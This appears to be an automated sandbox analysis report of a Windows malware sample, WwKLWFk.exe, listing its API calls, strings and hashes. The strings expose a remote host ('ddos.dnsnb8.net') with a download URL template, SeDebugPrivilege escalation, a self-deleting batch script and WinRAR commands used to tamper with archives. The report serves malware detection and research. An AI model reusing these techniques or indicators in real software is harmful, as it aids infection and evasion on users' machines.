                                    • Opcode Fuzzy Hash: 4f474c2830d898a7a13ef7e6ef30ff926e56764d45d9af6bbc426a0c8e11d7c7
                                    • Instruction Fuzzy Hash: FF116D32A1064ACFCF318E58CC997DD37E1FF15301F690419DE8D5B291DAB129A4CB94
                                    APIs
                                    • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,?,?,?,?,?,?,002113EF), ref: 002111AB
                                    • OpenProcessToken.ADVAPI32(00000000,00000028,002113EF,?,?,?,?,?,?,002113EF), ref: 002111BB
                                    • AdjustTokenPrivileges.ADVAPI32(002113EF,00000000,?,00000010,00000000,00000000), ref: 002111EB
                                    • CloseHandle.KERNEL32(002113EF), ref: 002111FA
                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,002113EF), ref: 00211203
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 002111A5
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                    • String ID: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                    • API String ID: 75692138-2197398117
                                    • Opcode ID: 251b9a96d3083a46019ec0e1124e3ae0e4c5a2d8a0f7a240349b01cb25421404
                                    • Instruction ID: 88e6e5f0fb6ba43f54984afb71941af1106b7bae778d082b11a16d2819130808
                                    • Opcode Fuzzy Hash: 251b9a96d3083a46019ec0e1124e3ae0e4c5a2d8a0f7a240349b01cb25421404
                                    • Instruction Fuzzy Hash: B00112B1900209EFDB00DFE4D989AEEBBF9FB18304F108069E606A2250DB709F849B50
                                    APIs
                                    • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe), ref: 002113BC
                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 002113DA
                                    • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00211448
                                      • Part of subcall function 0021119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,?,?,?,?,?,?,002113EF), ref: 002111AB
                                      • Part of subcall function 0021119F: OpenProcessToken.ADVAPI32(00000000,00000028,002113EF,?,?,?,?,?,?,002113EF), ref: 002111BB
                                      • Part of subcall function 0021119F: AdjustTokenPrivileges.ADVAPI32(002113EF,00000000,?,00000010,00000000,00000000), ref: 002111EB
                                      • Part of subcall function 0021119F: CloseHandle.KERNEL32(002113EF), ref: 002111FA
                                      • Part of subcall function 0021119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,002113EF), ref: 00211203
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 002113A8
                                    • SeDebugPrivilege, xrefs: 002113D3
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                    • String ID: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe$SeDebugPrivilege
                                    • API String ID: 4123949106-3284628267
                                    • Opcode ID: d839c4dff2c3f453058a886534425858b147008d660fdf59144765ed9852a81b
                                    • Instruction ID: b0ad65da885893c92b1a4530b7e802315690e1fcabd3137aa742e3a189631703
                                    • Opcode Fuzzy Hash: d839c4dff2c3f453058a886534425858b147008d660fdf59144765ed9852a81b
                                    • Instruction Fuzzy Hash: 18313071D1021AEADF20DFA5DC45FEEBBF8EB64704F2041A9E614B2141E7709EA5CB60
                                    APIs
                                    • strstr.MSVCRT ref: 002123CC
                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00212464
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00212472
                                    • CloseHandle.KERNEL32(?,00000000,00000000), ref: 002124A8
                                    • memset.MSVCRT ref: 002124B9
                                    • strrchr.MSVCRT ref: 002124C9
                                    • wsprintfA.USER32 ref: 002124DE
                                    • strrchr.MSVCRT ref: 002124ED
                                    • memset.MSVCRT ref: 002124F2
                                    • memset.MSVCRT ref: 00212505
                                    • wsprintfA.USER32 ref: 00212524
                                    • Sleep.KERNEL32(000007D0), ref: 00212535
                                    • Sleep.KERNEL32(000007D0), ref: 0021255D
                                    • memset.MSVCRT ref: 0021256E
                                    • wsprintfA.USER32 ref: 00212585
                                    • memset.MSVCRT ref: 002125A6
                                    • wsprintfA.USER32 ref: 002125CA
                                    • Sleep.KERNEL32(000007D0), ref: 002125D0
                                    • Sleep.KERNEL32(000007D0,?,?), ref: 002125E5
                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 002125FC
                                    • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00212611
                                    • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00212642
                                    • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 0021265B
                                    • SetEndOfFile.KERNEL32 ref: 0021266D
                                    • CloseHandle.KERNEL32(00000000), ref: 00212676
                                    • RemoveDirectoryA.KERNEL32(?), ref: 00212681
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                    • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                                    • API String ID: 2203340711-2180922006
                                    • Opcode ID: e273944cc7ddc104c232b6635a466280a2cb3f314a93d23d7ac190130b5d0ba6
                                    • Instruction ID: 29e5b09eb1d51bfb6e013dcb75b950cd89a1416c61a4eb95de36893c6b76aa1e
                                    • Opcode Fuzzy Hash: e273944cc7ddc104c232b6635a466280a2cb3f314a93d23d7ac190130b5d0ba6
                                    • Instruction Fuzzy Hash: 2581D2B1514345EBD710EF60EC48EEB7BEDFBA8704F00451AFA44D2190D770DAA88BA5
                                    APIs
                                    • memset.MSVCRT ref: 00212766
                                    • memset.MSVCRT ref: 00212774
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00212787
                                    • wsprintfA.USER32 ref: 002127AB
                                      • Part of subcall function 0021185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,77068400,http://%s:%d/%s/%s,?,?,?,00211118), ref: 00211867
                                      • Part of subcall function 0021185B: srand.MSVCRT ref: 00211878
                                      • Part of subcall function 0021185B: rand.MSVCRT ref: 00211880
                                      • Part of subcall function 0021185B: srand.MSVCRT ref: 00211890
                                      • Part of subcall function 0021185B: rand.MSVCRT ref: 00211894
                                    • wsprintfA.USER32 ref: 002127C6
                                    • CopyFileA.KERNEL32(?,00214C80,00000000), ref: 002127D4
                                    • wsprintfA.USER32 ref: 002127F4
                                      • Part of subcall function 00211973: PathFileExistsA.SHLWAPI(\N!`N!,00000000,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe), ref: 00211992
                                      • Part of subcall function 00211973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 002119BA
                                      • Part of subcall function 00211973: Sleep.KERNEL32(00000064), ref: 002119C6
                                      • Part of subcall function 00211973: wsprintfA.USER32 ref: 002119EC
                                      • Part of subcall function 00211973: CopyFileA.KERNEL32(?,?,00000000), ref: 00211A00
                                      • Part of subcall function 00211973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00211A1E
                                      • Part of subcall function 00211973: GetFileSize.KERNEL32(?,00000000), ref: 00211A2C
                                      • Part of subcall function 00211973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00211A46
                                      • Part of subcall function 00211973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00211A65
                                    • DeleteFileA.KERNEL32(?,?,00214E54,00214E58), ref: 0021281A
                                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00214E54,00214E58), ref: 00212832
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                    • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                    • API String ID: 692489704-3256556265
                                    • Opcode ID: fbc8175da9409c5e83f3bb3d5f3f696dd4893360877905c6f59033b56033e7e8
                                    • Instruction ID: f1d1a05a9ff9650179c76bc2a86c54def32949bdfeede6d70bd70008e78e2065
                                    • Opcode Fuzzy Hash: fbc8175da9409c5e83f3bb3d5f3f696dd4893360877905c6f59033b56033e7e8
                                    • Instruction Fuzzy Hash: A82145B695021C7BDB10FBA4AC89FDB77EDEB25744F0145A1B648E2041E6709FE48EA0
                                    APIs
                                      • Part of subcall function 0021185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,77068400,http://%s:%d/%s/%s,?,?,?,00211118), ref: 00211867
                                      • Part of subcall function 0021185B: srand.MSVCRT ref: 00211878
                                      • Part of subcall function 0021185B: rand.MSVCRT ref: 00211880
                                      • Part of subcall function 0021185B: srand.MSVCRT ref: 00211890
                                      • Part of subcall function 0021185B: rand.MSVCRT ref: 00211894
                                    • wsprintfA.USER32 ref: 002115AA
                                    • wsprintfA.USER32 ref: 002115C6
                                    • lstrlen.KERNEL32(?), ref: 002115D2
                                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 002115EE
                                    • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00211609
                                    • CloseHandle.KERNEL32(00000000), ref: 00211612
                                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0021162D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                    • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\WwKLWFk.exe$open
                                    • API String ID: 617340118-3809860907
                                    • Opcode ID: 2f85214cde9cfc18a7b7d69942c1da24207224f4182ef7d4d864769321a0ffd8
                                    • Instruction ID: 5009fc45957e07edcb5eb8c7f583103b9a4fa0626c174b078e0279f3d0d0f21c
                                    • Opcode Fuzzy Hash: 2f85214cde9cfc18a7b7d69942c1da24207224f4182ef7d4d864769321a0ffd8
                                    • Instruction Fuzzy Hash: 9F115476A511287ED720D7A4AC8DDEB7AEDDF69751F000051F94DE2040DA709BD48BB0
                                    APIs
                                    • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00211400), ref: 00211226
                                    • GetProcAddress.KERNEL32(00000000), ref: 0021122D
                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00211400), ref: 0021123F
                                    • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00211400), ref: 00211250
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,?,?,?,?,00211400), ref: 0021129E
                                    • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,?,?,?,?,00211400), ref: 002112B0
                                    • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,?,?,?,?,00211400), ref: 002112F5
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00211400), ref: 0021130A
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 00211262
                                    • ZwQuerySystemInformation, xrefs: 00211212
                                    • ntdll.dll, xrefs: 00211219
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                    • String ID: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe$ZwQuerySystemInformation$ntdll.dll
                                    • API String ID: 1500695312-191650490
                                    • Opcode ID: a5a784ab67eac7198c467b0f5851a20661374d55a3102b1e4deeee50bd4dea41
                                    • Instruction ID: 05e80c36c7b3b312d24578a849b7399d35571588e9548e5f31e00c6030ed53b0
                                    • Opcode Fuzzy Hash: a5a784ab67eac7198c467b0f5851a20661374d55a3102b1e4deeee50bd4dea41
                                    • Instruction Fuzzy Hash: 4C21F771615322ABD720DF64DC08BEBBAE9FB69B00F104918FA45D6240C770DAA0C7A5
                                    APIs
                                    • memset.MSVCRT ref: 002118B1
                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,774D0F00,77068400), ref: 002118D3
                                    • CloseHandle.KERNEL32(I%!), ref: 002118E9
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002118F0
                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00211901
                                    • CloseHandle.KERNEL32(?), ref: 0021190A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                    • String ID: I%!
                                    • API String ID: 876959470-613461988
                                    • Opcode ID: 622d2bcb1cf1be26279bab3703414e1048967dbe098e87f7b7137c866f6d6d45
                                    • Instruction ID: 0fe0dfda39983a201d8880414dbc071a90e2c19eef88833be5ef10723ab6663d
                                    • Opcode Fuzzy Hash: 622d2bcb1cf1be26279bab3703414e1048967dbe098e87f7b7137c866f6d6d45
                                    • Instruction Fuzzy Hash: 76017176901128BBCB21AB95EC4CDDF7FBEEF95760F104021FA15A51A0D6314A68CAA0
                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,77068400,http://%s:%d/%s/%s,?,?,?,00211118), ref: 00211867
                                    • srand.MSVCRT ref: 00211878
                                    • rand.MSVCRT ref: 00211880
                                    • srand.MSVCRT ref: 00211890
                                    • rand.MSVCRT ref: 00211894
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: Timerandsrand$FileSystem
                                    • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                                    • API String ID: 4106363736-3273462101
                                    • Opcode ID: c9b01733abf4b5b4851a23d749863c6ce3f13afbc2ae237e0882cd8b0431d761
                                    • Instruction ID: 999709632ba0b489a3c121b5238390733419168a2158949d703403d977f992de
                                    • Opcode Fuzzy Hash: c9b01733abf4b5b4851a23d749863c6ce3f13afbc2ae237e0882cd8b0431d761
                                    • Instruction Fuzzy Hash: C7E09277A00218BBDB00A7A9FC4A8DEBBECDE88161B100566F600D3250E970E9448AB4
                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,774CE800,?,?,002129DB,?,00000001), ref: 002126A7
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,774CE800,?,?,002129DB,?,00000001), ref: 002126B5
                                    • lstrlen.KERNEL32(?), ref: 002126C4
                                    • ??2@YAPAXI@Z.MSVCRT ref: 002126CE
                                    • lstrcpy.KERNEL32(00000004,?), ref: 002126E3
                                    • lstrcpy.KERNEL32(?,00000004), ref: 0021271F
                                    • ??3@YAXPAX@Z.MSVCRT ref: 0021272D
                                    • SetEvent.KERNEL32 ref: 0021273C
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                    • String ID:
                                    • API String ID: 41106472-0
                                    • Opcode ID: ac59e71c9825ba68f080e2e74f14cf4004628d1d03bcd2a670cabd8436ef82e9
                                    • Instruction ID: f14bca06f21ab9b9d27589058c86b392c04a120babd35caaafa476caf67185b3
                                    • Opcode Fuzzy Hash: ac59e71c9825ba68f080e2e74f14cf4004628d1d03bcd2a670cabd8436ef82e9
                                    • Instruction Fuzzy Hash: A1116A35510100EFCB21EF14FD4C8DBBBEAFBB87207248026F458C7160DA7089AACB90
                                    APIs
                                    Strings
                                    • HYkwRHdLBANDYCtoGcRKEpkAOeWayQoGcdBhktQgOJpeKnQmSqMSCGuVWeMPbmgPFXqTWJnIyPswMUnXpHzbisIxmwyYicdiILBhbVajzNvXlrZfERxFLANffEKrrqTDTDgzJvuoZhavCsFUVtlSlOjuUjZx, xrefs: 00211B8A, 00211B9C, 00211C15, 00211C49
                                    • .exe, xrefs: 00211C57
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: lstrcatmemcpymemsetrandsrand
                                    • String ID: .exe$HYkwRHdLBANDYCtoGcRKEpkAOeWayQoGcdBhktQgOJpeKnQmSqMSCGuVWeMPbmgPFXqTWJnIyPswMUnXpHzbisIxmwyYicdiILBhbVajzNvXlrZfERxFLANffEKrrqTDTDgzJvuoZhavCsFUVtlSlOjuUjZx
                                    • API String ID: 122620767-1533845309
                                    • Opcode ID: fa12bf020bb9a5b569e84c2ca25436c0a1a2a173fa34fc76a52b51a9e1ed678c
                                    • Instruction ID: 567083f5879dae93a4a7ca5a84f370839132aedde28fa13897828b1d96321667
                                    • Opcode Fuzzy Hash: fa12bf020bb9a5b569e84c2ca25436c0a1a2a173fa34fc76a52b51a9e1ed678c
                                    • Instruction Fuzzy Hash: 5821BE22E281906ED72523347C45BE93FC5CFB7714F2A809BF6894B1D2D5740AF582A4
                                    APIs
                                    • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00211334
                                    • GetProcAddress.KERNEL32(00000000), ref: 0021133B
                                    • memset.MSVCRT ref: 00211359
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: AddressHandleModuleProcmemset
                                    • String ID: NtSystemDebugControl$ntdll.dll
                                    • API String ID: 3137504439-2438149413
                                    • Opcode ID: 49fec680563984ab180af3583de8b798e3583becc6f547b685e43abaae4a5203
                                    • Instruction ID: 2044173a230741b41ee3b89e8a04756b4f62491d8a2568009c5a27a6a4a5044e
                                    • Opcode Fuzzy Hash: 49fec680563984ab180af3583de8b798e3583becc6f547b685e43abaae4a5203
                                    • Instruction Fuzzy Hash: C701617161030EBFDB10DF94AC899EFBBF8FB65314F00416AFA55A1144D67086A5CA91
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: strrchr$lstrcmpilstrcpylstrlen
                                    • String ID:
                                    • API String ID: 3636361484-0
                                    • Opcode ID: f9b853b6398b57d8b9d351cdacac6ac6fbc75ee7eb3f8e36940904f135a03090
                                    • Instruction ID: 0af37af5019c31ba967def36e628d7a6248fd74e7964ebaecff91025a982ad56
                                    • Opcode Fuzzy Hash: f9b853b6398b57d8b9d351cdacac6ac6fbc75ee7eb3f8e36940904f135a03090
                                    • Instruction Fuzzy Hash: 1F01FE729142166FEB109BA0FC4DBD67BDDDB24310F044065DB45D3091EE749AD4CBD0
                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0021603C
                                    • GetProcAddress.KERNEL32(00000000,00216064), ref: 0021604F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: kernel32.dll
                                    • API String ID: 1646373207-1793498882
                                    • Opcode ID: 9165358f50379daa0da7c28a0e4ac7227fdb079b12b920ca49df750f3e12789a
                                    • Instruction ID: 99d73123e93940b7cb86df75ef7e989c5c8560841c49c52959ca16207a41982a
                                    • Opcode Fuzzy Hash: 9165358f50379daa0da7c28a0e4ac7227fdb079b12b920ca49df750f3e12789a
                                    • Instruction Fuzzy Hash: C9F0F6B114028A8FDF708E64CC48BDE37E4EB25700F50042AEA09CB641CB348695CB14

                                    Execution Graph

                                    Execution Coverage:1.7%
                                    Dynamic/Decrypted Code Coverage:1.2%
                                    Signature Coverage:0%
                                    Total number of Nodes:245
                                    Total number of Limit Nodes:40
                                    execution_graph 23905 314ab0 GetPEB RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 23559 368330 23560 368377 23559->23560 23563 368348 std::locale::_Setgloballocale 23559->23563 23564 36b6b0 23560->23564 23562 36838a 23565 36b6d5 23564->23565 23566 36b7fc 23564->23566 23569 36b736 23565->23569 23570 36b743 23565->23570 23572 36b6ea 23565->23572 23587 302040 RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 23566->23587 23568 36b801 23588 301fa0 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task ___std_exception_copy 23568->23588 23569->23568 23569->23572 23575 3dc950 std::_Facet_Register 2 API calls 23570->23575 23577 36b6fa std::_Locinfo::_Locinfo_ctor std::locale::_Setgloballocale 23570->23577 23579 3dc950 23572->23579 23575->23577 23578 36b7ba std::_Locinfo::_Locinfo_ctor std::locale::_Setgloballocale 23577->23578 23589 3e1e70 RtlAllocateHeap ___std_exception_copy __Getctype 23577->23589 23578->23562 23582 3dc955 std::_Facet_Register 23579->23582 23581 3dc96f 23581->23577 23582->23581 23584 301fa0 Concurrency::cancel_current_task 23582->23584 23590 3eb5ec 23582->23590 23583 3dc97b 23583->23583 